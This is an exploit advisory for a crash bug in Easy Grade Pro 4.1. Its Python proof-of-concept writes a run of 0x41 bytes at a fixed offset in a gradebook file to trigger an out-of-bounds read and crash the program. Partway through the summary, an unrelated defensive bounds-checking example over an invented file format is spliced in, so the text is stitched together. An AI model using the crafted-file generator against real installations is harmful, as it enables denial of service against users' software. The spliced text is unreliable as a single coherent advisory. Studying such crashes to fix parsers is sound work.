=============================================================================================================================================
| # Title     : Easy Grade Pro 4.1 Malformed .EGP File Triggering Crash                                                                      |
| # Author    : indoushka                                                                                                                    |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                             |
| # Vendor    : https://archive.org/embed/egp-collection                                                                                     |
=============================================================================================================================================

[+] Summary :

This Python script generates a malformed .EGP gradebook file designed to trigger a crash in Easy Grade Pro 4.1 by corrupting data at a specific offset within the file.

The vulnerability lies in the application's file-parsing logic for its proprietary .EGP format. The parser relies on offsets stored inside the file to reconstruct internal data structures, but it does not validate that these offsets stay within the bounds of the loaded file buffer.

The script loads a legitimate .EGP file as a base template and injects a controlled payload at a predefined offset (548 bytes). The payload consists of repeated 0x41 bytes ("A"), which corrupt the internal offset calculations used during parsing. When the crafted file is opened by the application, this corruption can lead to an out-of-bounds read, resulting in an access violation and an application crash.

This Proof-of-Concept demonstrates a local denial-of-service condition caused by insufficient bounds validation during file parsing.
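The bounds check the summary says is missing, shown in an added Python example that is not part of this advisory or of Easy Grade Pro itself. Because the real .EGP layout is not documented here, the record format below (a magic value, a record count, a table of offset/length pairs, then the record bodies) is constructed purely for illustration, and all names (`parse_unchecked`, `parse_checked`, `MalformedFile`, `overwrite_at`) are assumptions. The unchecked parser trusts every offset in the file; the checked parser rejects any range that does not fit inside the loaded buffer, which is the behaviour a hardened reader of such a format needs.

```python
import struct

# Constructed layout for illustration only; NOT the real .EGP format.
HEADER = struct.Struct("<4sI")   # magic, record count
ENTRY = struct.Struct("<II")     # offset, length of one record
MAGIC = b"EGPX"                  # made-up magic value


class MalformedFile(ValueError):
    """Raised when a count, offset or length points outside the loaded buffer."""


def build_sample(records):
    """Constructed sample file: header, offset table, then the record bodies."""
    body_start = HEADER.size + ENTRY.size * len(records)
    table, bodies = b"", b""
    for rec in records:
        table += ENTRY.pack(body_start + len(bodies), len(rec))
        bodies += rec
    return HEADER.pack(MAGIC, len(records)) + table + bodies


def _checked_slice(buf, offset, length):
    """Return buf[offset:offset+length] only if the whole range lies inside buf.

    The comparison is written as `length > len(buf) - offset` rather than
    `offset + length > len(buf)` so the same logic is safe in C, where the
    sum of two attacker-controlled integers can wrap around.
    """
    if offset < 0 or length < 0 or offset > len(buf) or length > len(buf) - offset:
        raise MalformedFile(
            f"range offset={offset} length={length} exceeds {len(buf)}-byte buffer")
    return bytes(buf[offset:offset + length])


def parse_unchecked(buf):
    """Trusts every offset in the file: the pattern the advisory describes.

    In Python a bad slice silently yields truncated or empty data; in a
    native parser the same read walks off the end of the buffer and faults.
    """
    _magic, count = HEADER.unpack_from(buf, 0)
    records = []
    for i in range(count):
        off, ln = ENTRY.unpack_from(buf, HEADER.size + i * ENTRY.size)
        records.append(bytes(buf[off:off + ln]))   # no bounds validation
    return records


def parse_checked(buf):
    """Validates the header, the table and every record range before reading."""
    if len(buf) < HEADER.size:
        raise MalformedFile("file shorter than header")
    magic, count = HEADER.unpack_from(buf, 0)
    if magic != MAGIC:
        raise MalformedFile("bad magic")
    # `count` comes from the file, so the table size it implies is checked too
    table = _checked_slice(buf, HEADER.size, count * ENTRY.size)
    records = []
    for i in range(count):
        off, ln = ENTRY.unpack_from(table, i * ENTRY.size)
        records.append(_checked_slice(buf, off, ln))
    return records


def overwrite_at(buf, offset, size, byte=0x41):
    """Robustness-test mutation: overwrite `size` bytes at `offset` with one value."""
    out = bytearray(buf)
    out[offset:offset + size] = bytes([byte]) * size
    return bytes(out)


def rejects(buf):
    """True if the checked parser refuses the buffer with a clean diagnostic."""
    try:
        parse_checked(buf)
    except MalformedFile:
        return True
    return False


if __name__ == "__main__":
    good = build_sample([b"alice,95", b"bob,88"])
    print("checked, intact file   :", parse_checked(good))
    # Corrupt the first offset-table entry so offset and length become 0x41414141
    bad = overwrite_at(good, HEADER.size, ENTRY.size)
    print("unchecked, corrupt file:", parse_unchecked(bad))   # silently wrong
    print("checked, corrupt file  : rejected =", rejects(bad))
```

Running the block shows the difference that matters for the advisory's bug class: the unchecked parser returns an empty first record without complaint (the native equivalent of reading past the buffer), while the checked parser refuses the file before any out-of-range read happens. The same check also catches a corrupted record count, because the table size derived from `count` passes through `_checked_slice` before the table is used.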
The script performs several safety checks before creating the crafted file, including:

 - Verifying that a valid base .EGP file is present
 - Ensuring the injection offset lies within the file bounds
 - Expanding the file if the payload would extend past its original end

After successful execution, the script generates a new file named: exploit_poc.egp

Opening this file in Easy Grade Pro 4.1 may reproduce the crash associated with the vulnerability.

[+] POC :

import os
import sys


def generate_exploit():
    filename = "exploit_poc.egp"
    base_file = "base.egp"

    try:
        if not os.path.exists(base_file):
            print("[-] Base EGP file not found. Please place a valid 'base.egp' in the same directory.")
            return

        # Load the legitimate gradebook as a mutable byte buffer
        with open(base_file, "rb") as f:
            base_data = bytearray(f.read())

        injection_offset = 548      # byte offset that gets overwritten
        payload_size = 21           # number of bytes overwritten
        payload_char = b"\x41"      # "A"

        if injection_offset >= len(base_data):
            print("[-] Injection offset is outside file size.")
            return

        # Grow the buffer with zero padding if the payload would run past the end
        if injection_offset + payload_size > len(base_data):
            print("[!] Payload exceeds file size, resizing file...")
            base_data.extend(b"\x00" * ((injection_offset + payload_size) - len(base_data)))

        payload = payload_char * payload_size
        base_data[injection_offset:injection_offset + payload_size] = payload

        with open(filename, "wb") as f:
            f.write(base_data)

        print("[+] Exploit file created successfully")
        print(f"[+] Output File : {filename}")
        print(f"[+] Injection Offset : {injection_offset}")
        print(f"[+] Payload Size : {payload_size} bytes")
        print("[!] Open the file using Easy Grade Pro 4.1 to test the crash.")

    except Exception as e:
        print(f"[-] Error creating exploit file: {e}")


if __name__ == "__main__":
    generate_exploit()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================